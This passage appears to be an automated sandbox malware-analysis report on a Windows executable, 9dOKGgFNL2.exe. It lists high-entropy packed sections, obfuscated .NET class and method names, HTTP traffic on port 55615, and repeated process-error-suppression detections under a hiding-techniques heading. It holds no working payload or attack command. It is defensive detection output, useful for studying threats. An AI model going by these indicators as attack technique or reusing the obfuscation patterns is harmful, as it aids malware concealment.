                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_067DE5DF push es; ret 2_2_067DE5E0
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_071FBD9F push dword ptr [esp+ecx*2-75h]; ret 2_2_071FBDA3
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeCode function: 2_2_071F4DE4 pushfd ; retf 2_2_071F4DF1
                    Source: 9dOKGgFNL2.exeStatic PE information: section name: .text entropy: 7.770995746521688
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, RI5CbnHZJMOX38NIWe.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Jja8bB6lEU', 'NpG8WY4SLZ', 'i5g8z9xtJM', 'llbGpIplh1', 's9gGkAL39b', 'zgOG8XliWj', 'gRYGG5q8Fv', 'OWoDag98XMVVT6ETqbp'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, TVYCZS8CsAAf6xRfPr.csHigh entropy of concatenated method names: 'abTMGse3k', 'FfQD8fGjE', 'ocWX9F3Qj', 'o7EEysSd2', 'I7yu3gEtP', 'Ye1BG8lwQ', 'I34Ti0u4RcG9Qa7hdb', 'c0F1wry08HThRQ3JtF', 'woQY4oQUq', 'YwOoaVpYZ'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, mT0lgMk0UGmjhglQpy2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oNRRJJjkvv', 'CjuRoHlLyi', 'lHLR5jNOxN', 'aT3RRnSxHv', 'e7xRdkc7fx', 'xhKRsaPn3I', 'gVNR2Pxsy6'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, KXppZwBPgJ7E76VbXs.csHigh entropy of concatenated method names: 'cuulhrjjTF', 'A6alEaKRRv', 'XDDHgVl8Pd', 'PkjHFw6B1X', 'nSdHcJfTXo', 'OoJHL1JuHO', 'SeDHvKtLK0', 'fapHx59X52', 'r99HTYZJSi', 'fJcHCe16Rq'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, nlmoTBWi5RrBNjduPP.csHigh entropy of concatenated method names: 'v3UoH7e74r', 'r5ColW5onc', 'QEcotKLZDq', 'E6noIJVudW', 'cjyoJEWJf6', 'yCWoKUh9fA', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, T5CUBJkkW6oTYTPm6hD.csHigh entropy of concatenated method names: 'utQoWGyfoQ', 'EBXozPAXTS', 'vCk5pjR2wW', 'qsf5ktLSs9', 'f2k58Y4chO', 'HvI5G57mZ0', 'I9X50wT2Z7', 'rjT53EdlhF', 'OjE5yVTrP7', 'YmP5q5xPxi'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, qDbtOObWgkLUDUcOmK.csHigh entropy of concatenated method names: 'cunJ6k4HuC', 'RtjJUh4WPV', 'OldJgCnBv1', 'F1YJFAfh04', 'ArwJcubO61', 'ye1JLGOyeY', 's69JvqD3yP', 'OstJxSfJAf', 'L6VJTTx7vZ', 'FJMJC6wGqb'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, Tgldtnuspxe3w9nTJA.csHigh entropy of concatenated method names: 'M9wHDRHrdU', 'lPpHXPKqoQ', 'VDPHZGtRXK', 'Xb6HuwNOpL', 'kuGHPAmcBH', 'vpIHSc0G6B', 'p4sHVwZLO6', 'rxtHY6Tmrv', 'CbBHJaf2CW', 'KHRHo7QA90'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, pa30ECvIFvyAltBGSh.csHigh entropy of concatenated method names: 'tBDIyO21fN', 'iE8IHYIm0a', 'hw3ItxSF45', 'B1rtWHGog3', 'KIItzWhFfb', 'j2sIpCAW4U', 'HVsIkyN3DW', 'UqbI80l6MO', 'FU1IGsgEUS', 'IO9I0U0D91'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, to6tbw1Sv4LCFDGbFJ.csHigh entropy of concatenated method names: 'KJZ7ZJJeLY', 'l8D7u7wv5m', 'TuI76cIJeD', 'y317UNlsQn', 'LNU7FTlA4i', 'x187ceYm7b', 'del7v1ZEX9', 'pyn7xTJ7u1', 'r0k7CLxjj7', 'OUQ7ja5j8L'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, neicNOfGWVJmDBuMMa.csHigh entropy of concatenated method names: 'DikVmP2p2L', 'PeIVW2r6qk', 'JYYYpHBxAr', 'qKmYkZRh9D', 'MY3VjXuh8G', 'R89VNoYK3i', 'eXtV1fpGv4', 'KrpV4JsD35', 'lHKVA3upPb', 'AJxViniaRr'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, Rc2muXTKqVZvJsmYO7.csHigh entropy of concatenated method names: 'cfIIeo0CNR', 'JmhIOHRY7q', 'eh0IMm9UBh', 'nDkIDJR07p', 'qoxIhLi5oB', 'i2oIXM3EfE', 'XQHIEVrjOW', 'ySLIZSAb7Y', 'QxjIu9oM3E', 'lEvIB0OCXs'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, TLjf954KTOhdvwbmoK.csHigh entropy of concatenated method names: 'TN6PCUfeNQ', 'UIjPNB2QMf', 'IubP4pjyUb', 'xFBPADHqnK', 'twkPUQLnkX', 'wQVPgP0Iet', 'Hr2PFDLgXT', 'yQ6PcVARZE', 'TLRPLLHUji', 'hMMPvfiAEj'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, demNsXKQQ5dOWKyKaT.csHigh entropy of concatenated method names: 'K0EG3hIdYk', 'nZqGy7xs3s', 'lyyGqyJu0d', 'zCcGHbB18s', 'mOMGlFWd1D', 'c7aGtdJoPg', 'hE8GIADHYc', 'jIHGKFEn6e', 'aUsGnvT6Y0', 'oWxGQvwnQy'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, O23pNJ6EhjttsNQhGK.csHigh entropy of concatenated method names: 'VqYt3uxTLn', 'FRQtqg3KDy', 'H6rtl4LRLm', 'GRgtIocc4x', 'eXYtKXqBnb', 'LjtlwUL1qE', 'vA7lf8XP7U', 'AN8l9viaIk', 'Ee9lmjH2qK', 'vXMlb9qiZb'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, d5oNk0qNHVBJ02cV5H.csHigh entropy of concatenated method names: 'Dispose', 'dKNkbKj2BC', 'N6F8U9nZPW', 'xt8nNCcuZx', 'WaPkWj1CsY', 'lAGkzIRUAJ', 'ProcessDialogKey', 'duV8pDbtOO', 'Ygk8kLUDUc', 'ymK887lmoT'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, GnKswFzT5fBSNjTCYX.csHigh entropy of concatenated method names: 'guZoXFdbJD', 'zaGoZj1VEJ', 'TkxouXkZK9', 'UqKo660TxR', 'dj6oUNCV5S', 'lUdoFCiJwd', 'aEUockj3NL', 'BbSo2DlJTs', 'jjuoeHRPNO', 'JHFoOqssRx'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, anJOVC9Gs0KNKj2BCm.csHigh entropy of concatenated method names: 'nLBJPSNxIK', 'MX0JV8rTGU', 'zXgJJSJDia', 'hZdJ5VUsh9', 'cQnJdRxPDQ', 'AaZJ2akfLy', 'Dispose', 'qpOYy6aJAf', 'CPxYqCafiQ', 'C9lYHy4aBY'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, iZq82EZ6VPakI888Ti.csHigh entropy of concatenated method names: 'ETaq4qXUTJ', 'XKJqAsVrDR', 'T8CqiVQ8GZ', 'WFkqr0rMWw', 'kdyqwQf4v5', 'i8tqfUDUg5', 'rgWq93sdG4', 'N7MqmNm0Gq', 'itEqbXKUMv', 'FIWqW9FIZ6'
                    Source: 0.2.9dOKGgFNL2.exe.45c6af0.0.raw.unpack, QjRGfp0mhEGSXg3p4e.csHigh entropy of concatenated method names: 'GmtkIZq82E', 'GVPkKakI88', 'lspkQxe3w9', 'lTJkaALXpp', 'GVbkPXsj23', 'aNJkSEhjtt', 'iOcjHrm9R8xWXHVrkP', 'fuhlW7qAUmE8DYZHrv', 'Tvbkk4Xbfl', 'tDjkGf3dpI'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, RI5CbnHZJMOX38NIWe.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Jja8bB6lEU', 'NpG8WY4SLZ', 'i5g8z9xtJM', 'llbGpIplh1', 's9gGkAL39b', 'zgOG8XliWj', 'gRYGG5q8Fv', 'OWoDag98XMVVT6ETqbp'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, TVYCZS8CsAAf6xRfPr.csHigh entropy of concatenated method names: 'abTMGse3k', 'FfQD8fGjE', 'ocWX9F3Qj', 'o7EEysSd2', 'I7yu3gEtP', 'Ye1BG8lwQ', 'I34Ti0u4RcG9Qa7hdb', 'c0F1wry08HThRQ3JtF', 'woQY4oQUq', 'YwOoaVpYZ'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, mT0lgMk0UGmjhglQpy2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oNRRJJjkvv', 'CjuRoHlLyi', 'lHLR5jNOxN', 'aT3RRnSxHv', 'e7xRdkc7fx', 'xhKRsaPn3I', 'gVNR2Pxsy6'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, KXppZwBPgJ7E76VbXs.csHigh entropy of concatenated method names: 'cuulhrjjTF', 'A6alEaKRRv', 'XDDHgVl8Pd', 'PkjHFw6B1X', 'nSdHcJfTXo', 'OoJHL1JuHO', 'SeDHvKtLK0', 'fapHx59X52', 'r99HTYZJSi', 'fJcHCe16Rq'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, nlmoTBWi5RrBNjduPP.csHigh entropy of concatenated method names: 'v3UoH7e74r', 'r5ColW5onc', 'QEcotKLZDq', 'E6noIJVudW', 'cjyoJEWJf6', 'yCWoKUh9fA', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, T5CUBJkkW6oTYTPm6hD.csHigh entropy of concatenated method names: 'utQoWGyfoQ', 'EBXozPAXTS', 'vCk5pjR2wW', 'qsf5ktLSs9', 'f2k58Y4chO', 'HvI5G57mZ0', 'I9X50wT2Z7', 'rjT53EdlhF', 'OjE5yVTrP7', 'YmP5q5xPxi'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, qDbtOObWgkLUDUcOmK.csHigh entropy of concatenated method names: 'cunJ6k4HuC', 'RtjJUh4WPV', 'OldJgCnBv1', 'F1YJFAfh04', 'ArwJcubO61', 'ye1JLGOyeY', 's69JvqD3yP', 'OstJxSfJAf', 'L6VJTTx7vZ', 'FJMJC6wGqb'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, Tgldtnuspxe3w9nTJA.csHigh entropy of concatenated method names: 'M9wHDRHrdU', 'lPpHXPKqoQ', 'VDPHZGtRXK', 'Xb6HuwNOpL', 'kuGHPAmcBH', 'vpIHSc0G6B', 'p4sHVwZLO6', 'rxtHY6Tmrv', 'CbBHJaf2CW', 'KHRHo7QA90'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, pa30ECvIFvyAltBGSh.csHigh entropy of concatenated method names: 'tBDIyO21fN', 'iE8IHYIm0a', 'hw3ItxSF45', 'B1rtWHGog3', 'KIItzWhFfb', 'j2sIpCAW4U', 'HVsIkyN3DW', 'UqbI80l6MO', 'FU1IGsgEUS', 'IO9I0U0D91'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, to6tbw1Sv4LCFDGbFJ.csHigh entropy of concatenated method names: 'KJZ7ZJJeLY', 'l8D7u7wv5m', 'TuI76cIJeD', 'y317UNlsQn', 'LNU7FTlA4i', 'x187ceYm7b', 'del7v1ZEX9', 'pyn7xTJ7u1', 'r0k7CLxjj7', 'OUQ7ja5j8L'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, neicNOfGWVJmDBuMMa.csHigh entropy of concatenated method names: 'DikVmP2p2L', 'PeIVW2r6qk', 'JYYYpHBxAr', 'qKmYkZRh9D', 'MY3VjXuh8G', 'R89VNoYK3i', 'eXtV1fpGv4', 'KrpV4JsD35', 'lHKVA3upPb', 'AJxViniaRr'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, Rc2muXTKqVZvJsmYO7.csHigh entropy of concatenated method names: 'cfIIeo0CNR', 'JmhIOHRY7q', 'eh0IMm9UBh', 'nDkIDJR07p', 'qoxIhLi5oB', 'i2oIXM3EfE', 'XQHIEVrjOW', 'ySLIZSAb7Y', 'QxjIu9oM3E', 'lEvIB0OCXs'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, TLjf954KTOhdvwbmoK.csHigh entropy of concatenated method names: 'TN6PCUfeNQ', 'UIjPNB2QMf', 'IubP4pjyUb', 'xFBPADHqnK', 'twkPUQLnkX', 'wQVPgP0Iet', 'Hr2PFDLgXT', 'yQ6PcVARZE', 'TLRPLLHUji', 'hMMPvfiAEj'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, demNsXKQQ5dOWKyKaT.csHigh entropy of concatenated method names: 'K0EG3hIdYk', 'nZqGy7xs3s', 'lyyGqyJu0d', 'zCcGHbB18s', 'mOMGlFWd1D', 'c7aGtdJoPg', 'hE8GIADHYc', 'jIHGKFEn6e', 'aUsGnvT6Y0', 'oWxGQvwnQy'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, O23pNJ6EhjttsNQhGK.csHigh entropy of concatenated method names: 'VqYt3uxTLn', 'FRQtqg3KDy', 'H6rtl4LRLm', 'GRgtIocc4x', 'eXYtKXqBnb', 'LjtlwUL1qE', 'vA7lf8XP7U', 'AN8l9viaIk', 'Ee9lmjH2qK', 'vXMlb9qiZb'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, d5oNk0qNHVBJ02cV5H.csHigh entropy of concatenated method names: 'Dispose', 'dKNkbKj2BC', 'N6F8U9nZPW', 'xt8nNCcuZx', 'WaPkWj1CsY', 'lAGkzIRUAJ', 'ProcessDialogKey', 'duV8pDbtOO', 'Ygk8kLUDUc', 'ymK887lmoT'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, GnKswFzT5fBSNjTCYX.csHigh entropy of concatenated method names: 'guZoXFdbJD', 'zaGoZj1VEJ', 'TkxouXkZK9', 'UqKo660TxR', 'dj6oUNCV5S', 'lUdoFCiJwd', 'aEUockj3NL', 'BbSo2DlJTs', 'jjuoeHRPNO', 'JHFoOqssRx'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, anJOVC9Gs0KNKj2BCm.csHigh entropy of concatenated method names: 'nLBJPSNxIK', 'MX0JV8rTGU', 'zXgJJSJDia', 'hZdJ5VUsh9', 'cQnJdRxPDQ', 'AaZJ2akfLy', 'Dispose', 'qpOYy6aJAf', 'CPxYqCafiQ', 'C9lYHy4aBY'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, iZq82EZ6VPakI888Ti.csHigh entropy of concatenated method names: 'ETaq4qXUTJ', 'XKJqAsVrDR', 'T8CqiVQ8GZ', 'WFkqr0rMWw', 'kdyqwQf4v5', 'i8tqfUDUg5', 'rgWq93sdG4', 'N7MqmNm0Gq', 'itEqbXKUMv', 'FIWqW9FIZ6'
                    Source: 0.2.9dOKGgFNL2.exe.7d00000.4.raw.unpack, QjRGfp0mhEGSXg3p4e.csHigh entropy of concatenated method names: 'GmtkIZq82E', 'GVPkKakI88', 'lspkQxe3w9', 'lTJkaALXpp', 'GVbkPXsj23', 'aNJkSEhjtt', 'iOcjHrm9R8xWXHVrkP', 'fuhlW7qAUmE8DYZHrv', 'Tvbkk4Xbfl', 'tDjkGf3dpI'

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49738
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
